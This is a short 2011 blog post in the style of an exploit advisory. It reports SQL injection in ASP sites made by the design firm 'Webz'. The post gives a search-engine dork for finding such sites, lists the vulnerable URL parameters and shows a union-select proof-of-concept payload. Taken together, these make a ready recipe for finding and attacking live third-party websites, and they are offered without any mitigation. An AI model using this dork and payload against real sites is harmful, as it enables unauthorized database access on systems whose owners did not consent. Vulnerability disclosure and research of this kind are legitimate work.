Web Design by Webz Vulnerable to SQL Injection ~ Random stuff by yappare

Tuesday, March 8, 2011

Web Design by Webz Vulnerable to SQL Injection

on March 08, 2011 No comments

Title : Web Design by Webz Vulnerable to SQL Injection
Web : http://www.webz.com.my/
Found by: p0pc0rn 08/03/2011
Dork : intext:"Web Design by Webz" filetype:asp

SQL - Microsoft JET Database Engine error
------------------------------------------

http://site.com/xxx.asp?id=[SQL]
http://site.com/xxx.asp?catID=[SQL]
http://site.com/xxx.asp?brandID=[SQL]

and other parameters are vulnerable to SQL Injection

POC
---

http://site.com/xxx.asp?id=1 union select 1 from test.a

thanks,
-p0pc0rn-

Random stuff by yappare

Tuesday, March 8, 2011

Web Design by Webz Vulnerable to SQL Injection

0 comments:

Text Widget

Popular Posts

Pages

Blog Archive

Recent Posts

Unordered List

Categories